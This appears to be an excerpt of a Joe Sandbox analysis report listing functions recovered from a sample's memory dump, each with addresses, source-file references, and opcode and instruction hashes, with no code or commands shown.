                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 532e296779ac337b6a02ca76600f0b57740fbcf7edfa9bf8ac6698493478af16
                                                      • Instruction ID: 20c77e4df5c645ff27b5679b923c9d5f68803452fa2659cd0e3dcdd94b535fa8
                                                      • Opcode Fuzzy Hash: 532e296779ac337b6a02ca76600f0b57740fbcf7edfa9bf8ac6698493478af16
                                                      • Instruction Fuzzy Hash: 9D11E036A84745AFDB29CF59D888B5A7BE4FB85764F104519FA05CF240C770E841CFA0
                                                      Function 016B4B00 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e7b69143b95e64d3211887c424e311b49e9d7a331a33b46ad7b4e40224a6ba
                                                      • Instruction ID: 4078bf7e3bf8c9883bc9cb089eda74094a8bdab309f81c3e135e4b40b90869ef
                                                      • Opcode Fuzzy Hash: 05e7b69143b95e64d3211887c424e311b49e9d7a331a33b46ad7b4e40224a6ba
                                                      • Instruction Fuzzy Hash: B111A0362006119BDB229A69DC80FA6BBA6FFC4751F154529EB83C7791DF30A842CB90
                                                      Function 01616620 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd8d6dcb6da5197ddf582282ffa93c67d638a9783f48940cb0346d46b21e3050
                                                      • Instruction ID: 68ee84998a1c7321868c4f89f1326c246a80a490726f07aaf036410f7cd37af5
                                                      • Opcode Fuzzy Hash: cd8d6dcb6da5197ddf582282ffa93c67d638a9783f48940cb0346d46b21e3050
                                                      • Instruction Fuzzy Hash: A011827AE00626ABDB21DF59CD80B5EFBB8FF88750F550859DA01AB305D770AD01CB91
                                                      Function 0160EA2E Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3a47ff8fa7ae11d21c86f81ef9c434db260aeface03237cee3e23bb250e1608
                                                      • Instruction ID: a02de2a50d5981d29b96ea864a71cedf29a72ad42d3225fb483ae370dfba0e06
                                                      • Opcode Fuzzy Hash: e3a47ff8fa7ae11d21c86f81ef9c434db260aeface03237cee3e23bb250e1608
                                                      • Instruction Fuzzy Hash: 65019671A011069FC72ADF19DD44F16BBF9FBC5314F21456EE1058B660C7B19C81CB94
                                                      Function 0160E53E Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction ID: c6b4fb8058b2e0467087f20929bf0ead474507f546939f4ed81617442feb8014
                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction Fuzzy Hash: C311E1722016D2DBE723972CCD54B267B94BB41788F1908E0EE41DB7D2F72AC882C260
                                                      Function 0166E75D Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction ID: c98e1bcffb8d77aef39b5a61239d3a68b99cee13eeaa34be16f299132549710a
                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction Fuzzy Hash: CD01803A700206AFEB25DF59CC04B6A7EADEB85B50F158428EA059B260E77ADD41C790
                                                      Function 015DA250 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction ID: 93c5a668c8347499c723d854dc6e31964dbaac17a86359ced22a982790564602
                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction Fuzzy Hash: 7301C072505B229BDB318F1E9840A2B7BE9FB55B607008A2DF995CF681D731D800CBA0
                                                      Function 016B4940 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a29176e81da687f0c584db813885be69dfddeda3ee843158619c71d039e49125
                                                      • Instruction ID: c65ef2debe8523b5bc5c04675638482f9f831b1b0be1a139cb967149daa289e4
                                                      • Opcode Fuzzy Hash: a29176e81da687f0c584db813885be69dfddeda3ee843158619c71d039e49125
                                                      • Instruction Fuzzy Hash: 940126724412129FC332EF1CCC80E96B7A8EF81370B154219EA6A9B293DB30D841C7C0
                                                      Function 0165E1D0 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1af763c1fd02c9d383019f7cc08351599c4b6c6916b1d61376d7ad852b1569c3
                                                      • Instruction ID: 1dc69773fbed01a1199e2dd981cec034026b6cee5e4c64e02c18a3c40cc5956f
                                                      • Opcode Fuzzy Hash: 1af763c1fd02c9d383019f7cc08351599c4b6c6916b1d61376d7ad852b1569c3
                                                      • Instruction Fuzzy Hash: 22118E31641641EFDB15AF19CD90F16BBB9FF94B84F100069E9059B651C635ED01CA90
                                                      Function 015E6259 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74b579ba8a0bc2f29c17a8894870d9a5fe89213701dbdd044ce95f786219875f
                                                      • Instruction ID: c54ef4823bace91e88a7a75ca30eb51d91fd806f6f8baf0c3767fbe8998e1dc0
                                                      • Opcode Fuzzy Hash: 74b579ba8a0bc2f29c17a8894870d9a5fe89213701dbdd044ce95f786219875f
                                                      • Instruction Fuzzy Hash: B8117071941629ABDB25EB64CC61FED73B5BF18714F5041D8E314AA1E0D7709E81CF88
                                                      Function 01666050 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08ab63c5fdc7855f5fb1db95ea7a550a3cbd7aeb7a976312c992cb67e82cbb80
                                                      • Instruction ID: bf757d2feb8071b87e72fa89c40cd28aba461c87bb5d1b99a3f979c28d30a4af
                                                      • Opcode Fuzzy Hash: 08ab63c5fdc7855f5fb1db95ea7a550a3cbd7aeb7a976312c992cb67e82cbb80
                                                      • Instruction Fuzzy Hash: 59112973D00019ABCB11DB94DC80DDFBBBDEF48254F044166E906E7211EA34EA15CBE0
                                                      Function 015E208A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction ID: 34321acb7346b7f47820b9876fb5786f9698cf58da2adf83aaa9c2f8314050b4
                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction Fuzzy Hash: C401F572A011018BEF198A5DDC84A967BEBBFC4700F1545A9ED058F28ADA71CC81C390
                                                      Function 01676500 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02a02a260a22cfb9c91aaaa9b7b9ba74685c531c640fb3f65c8ab000d442b06a
                                                      • Instruction ID: 6636a4860a7f3a5858b7bf18934cfc47c2c6b4527e8f236f9f5f41e433871c63
                                                      • Opcode Fuzzy Hash: 02a02a260a22cfb9c91aaaa9b7b9ba74685c531c640fb3f65c8ab000d442b06a
                                                      • Instruction Fuzzy Hash: B611A1326445469FE711CF68D800BA6BBB9FB9A314F088159E949CB315D732EC81DBA0
                                                      Function 0166C810 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51f105001ada2449522a575054818fcd3cbd21e1a5783b4b1302d30e0e2b985e
                                                      • Instruction ID: 6a7ad8a7d06a92af4ddc1e82d73d8d4c1661039760832723eda70239f4371cd5
                                                      • Opcode Fuzzy Hash: 51f105001ada2449522a575054818fcd3cbd21e1a5783b4b1302d30e0e2b985e
                                                      • Instruction Fuzzy Hash: D51118B1E006199BCB00DFA9D941AAEBBF8FF58350F10406AE905E7351D674EA01CBA4
                                                      Function 0168EA60 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e748a465ddc087866885872d6006a1a776b3838a189e15c39efd1d852aa84870
                                                      • Instruction ID: 3ea01713e749a9dd8355b066b45293abf073b62de01c22de7601cd320269db8a
                                                      • Opcode Fuzzy Hash: e748a465ddc087866885872d6006a1a776b3838a189e15c39efd1d852aa84870
                                                      • Instruction Fuzzy Hash: 9901B1715402129BCB32BF19CC44D36FBA9FF92A50B05452EEA555F311CB22DC42CB91
                                                      Function 015DC020 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction ID: 6c6978770460e79238ec40d255229b0af5b24ce8680e8fc8d28ced9d0885123b
                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction Fuzzy Hash: 6F01B532100705DFEB3296ADCC40AAB77EEFFC5254F44881DA6468B680DA70E442C750
                                                      Function 016220F0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a94c81667d4361a25ddc511df45892775c15ba35d7e382ef536b23224d72d2ea
                                                      • Instruction ID: 6504a54127e5b7e3c13910f009d69d66521f60df7fa77442dfe69975235cf23c
                                                      • Opcode Fuzzy Hash: a94c81667d4361a25ddc511df45892775c15ba35d7e382ef536b23224d72d2ea
                                                      • Instruction Fuzzy Hash: 72116935A0165DAFDB15EFA8CC54FAE7BBAFB44384F10405DEA019B290DA35AE11CF90
                                                      Function 0161E5CF Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a72c7a63e5386ce46bc66fb6cad44ad876c8e43815180c513347d947dae2cef
                                                      • Instruction ID: ae65122a2f81f749d4d3c05fef15bc7053e8086193c5205c2f9046cd9b8b0230
                                                      • Opcode Fuzzy Hash: 9a72c7a63e5386ce46bc66fb6cad44ad876c8e43815180c513347d947dae2cef
                                                      • Instruction Fuzzy Hash: D601F7B1610903BFD311AB3ACD44E13B7ACFF95794B01062DF6058B651DB24EC01C6E0
                                                      Function 016769C0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 116cd584e3fee1b6777bf95cf5606daa9de3c3e5e10b67c7b8d8770c42e023fb
                                                      • Instruction ID: 0718709696142948aa3b8436c420ccb79e4041698c18de63bf3be4fda67b6dda
                                                      • Opcode Fuzzy Hash: 116cd584e3fee1b6777bf95cf5606daa9de3c3e5e10b67c7b8d8770c42e023fb
                                                      • Instruction Fuzzy Hash: C201D832614A129FD324EF6EDC489A6BBA8FB98660F114129ED5987280E7309915CBD1
                                                      Function 0166C460 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 269a499603706e7bdd0e7679201f0e9cffecda117a1d7811a05dccdee85cb1ce
                                                      • Instruction ID: d086cc4a24f8455b7ef8baeb9c91a2ea70b5b001d5ae7ceeafbc25bae03e8eab
                                                      • Opcode Fuzzy Hash: 269a499603706e7bdd0e7679201f0e9cffecda117a1d7811a05dccdee85cb1ce
                                                      • Instruction Fuzzy Hash: 77111775A01609EBDB15EFA8CC44EAE7BBAFB98350F004099F94197390DA35EA11DB90
                                                      Function 0166C97C Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfb0b472f7cf6dfcbb37ba408b109df81d38ed56ad57a990efd9ecb9c6339eca
                                                      • Instruction ID: c61da6f724ab5487f60e7539974d7b2ada26cbfc067f1b20f28da194bf69692f
                                                      • Opcode Fuzzy Hash: dfb0b472f7cf6dfcbb37ba408b109df81d38ed56ad57a990efd9ecb9c6339eca
                                                      • Instruction Fuzzy Hash: 33117C71A047459FC700DF69C84195BBBE8FF98310F00451EF998D7390D630E900CB96
                                                      Function 0166CA11 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 612acf2589be0703c585d9e781ff049d8db6e81fd7291666d2d0eb68080e71a9
                                                      • Instruction ID: df586978cf9e8fd8744d52d08a99b57d3f905219c08064355923cd163deb1365
                                                      • Opcode Fuzzy Hash: 612acf2589be0703c585d9e781ff049d8db6e81fd7291666d2d0eb68080e71a9
                                                      • Instruction Fuzzy Hash: DC117C71A047059FC300DF69C84194BBBE8FF99350F00451EF998D7394E630E900CBA6
                                                      Function 015FE016 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction ID: 5971a1ab6ce26683f02b4ab96d66714bba49f42476c2e8e77c0ca16f5bf87545
                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction Fuzzy Hash: E20178722006809FE322861DC948F2A7BEDFB84794F0A04A9FA05CF6A1D778DC40CA25
                                                      Function 015D826B Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31b7eb6f686a17a5520f1af912d4fdb74d3f8792a9edfe3e467e4b0ab5f4d9c5
                                                      • Instruction ID: ed85e7018ab030286d1acf9fcf4597bd43b8db5c03795a52bdc68e7dbc734513
                                                      • Opcode Fuzzy Hash: 31b7eb6f686a17a5520f1af912d4fdb74d3f8792a9edfe3e467e4b0ab5f4d9c5
                                                      • Instruction Fuzzy Hash: 2101D431B00505DFC724EB6DDC409AE77E9FF81220B0A4469D902AB244EE20D801C791
                                                      Function 0168EB50 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9561699e28e889af99fb31d49513e36f67adcc413405f8ccb20f92330600f764
                                                      • Instruction ID: 6855adf4142371d5676fd903ecaa376d186ac7e6e28e595b91285d3244822dc3
                                                      • Opcode Fuzzy Hash: 9561699e28e889af99fb31d49513e36f67adcc413405f8ccb20f92330600f764
                                                      • Instruction Fuzzy Hash: 8D018FB1781A02AFD3316F19DD40F16BAA8AF55B50F01482EE70A9F390D7B1D8418B58
                                                      Function 015E2582 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 042fb0a78a7bc2eea4894877804b96743dbb695f8cb02aed811b6f81c1d1a3f1
                                                      • Instruction ID: 18b2bbdce9705c3c5da575c58bc8048e363f8e9207ce0d8d007297b525a18f57
                                                      • Opcode Fuzzy Hash: 042fb0a78a7bc2eea4894877804b96743dbb695f8cb02aed811b6f81c1d1a3f1
                                                      • Instruction Fuzzy Hash: 63F0F472A41B11BBC7359B5A8D44F07BEEDFFC4B90F114429A6069F600DA30ED01CAA0
                                                      Function 0160C073 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction ID: 52652bfc0451995940c8034a74cfe3e98744d02531d7baacf626fa2aa8f7b1ea
                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction Fuzzy Hash: C9F0C8B2600615ABD325CF4DDC40E57FBEADBD1A80F04856CE615C7320E631DD04CB50
                                                      Function 016B634F Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c76613a3edd0d851333a3403a86ddeadecadeda9b5fc5618fe56bd77486eba1
                                                      • Instruction ID: e84bddd106df27c706df98018733c837d264904d58804d907b6306b4d2b6d67a
                                                      • Opcode Fuzzy Hash: 3c76613a3edd0d851333a3403a86ddeadecadeda9b5fc5618fe56bd77486eba1
                                                      • Instruction Fuzzy Hash: F8012171E11619EBDB04DFA9D951A9EB7F8FF58304F10406AE904EB350D7749A01CBA4
                                                      Function 015DC310 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction ID: 433d78508368a85ff878a9017010a77f9ae198dcaeaf940085dca3491b270968
                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction Fuzzy Hash: 19F02B73258A339BD7325A9D8840B6FAAD5FFD1A64F1A007DF2099F244CE648D02E7D0
                                                      Function 016B625D Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5643d78a9edf4cfcfa5c038a40d2f6a39e85c601527b28e8c43b735ac9e396a4
                                                      • Instruction ID: 6eb9dc77c9fa8c970cdde38b7608403f7ef971326eb963b408bb7e9ae0169dcc
                                                      • Opcode Fuzzy Hash: 5643d78a9edf4cfcfa5c038a40d2f6a39e85c601527b28e8c43b735ac9e396a4
                                                      • Instruction Fuzzy Hash: E2012171E1061AEBDB04DFA9D851AAEB7F8FF58344F10805AF904EB351D6749901CBA4
                                                      Function 016B62D6 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                                      • Instruction ID: 59ac34dcca99d6b7188cea4a307ec46086d97d09539b3bc68e78c74199e16248
                                                      • Opcode Fuzzy Hash: aa4cba7b0e4c03fdd31d0a426ae72dc8d6c85c92974249419641edf8afbd9633
                                                      • Instruction Fuzzy Hash: 9C012171E01219EBDB04DFA9D841A9EBBF8FF58304F50405AE914EB390D674D901CBA4
                                                      Function 0161CA6F Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction ID: 3e8a209863417396007c268404d50e3b97897da3518b7e7461075124d52acb2b
                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction Fuzzy Hash: 8901AD322416859BE323971ECD05B59BF9CEF81750F0C40A9FE448BBA1D769C801C210
                                                      Function 016B61E5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
